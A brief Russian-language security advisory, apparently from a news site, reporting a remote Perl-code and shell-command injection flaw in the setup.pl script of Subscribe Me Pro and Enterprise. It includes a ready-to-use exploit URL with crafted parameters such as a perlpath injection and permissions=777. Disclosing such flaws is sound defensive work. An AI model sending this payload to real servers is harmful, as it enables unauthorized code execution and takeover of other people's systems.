Программа: Subscribe Me 

Уязвимость обнаружена в Subscribe Me Pro и Subscribe Me
Enterprise. Удаленный пользователь может выполнить произвольные команды оболочки на целевой системе.
Уязвимость в сценарии setup.pl позволяет удаленному пользователю внедрить произвольный Perl код, который будет выполнен на целевом сервере.

Пример: 

http://[target]/cgi-bin/setup.pl?RUNINSTALLATION= yes&information=~&extension=pl&config=pl&
permissions=777&os=notunixornt&perlpath= %20.»&websiteurl=evilhacker&br_username=
evilhacker&session_id=0&cgipath=.



Оставить мнение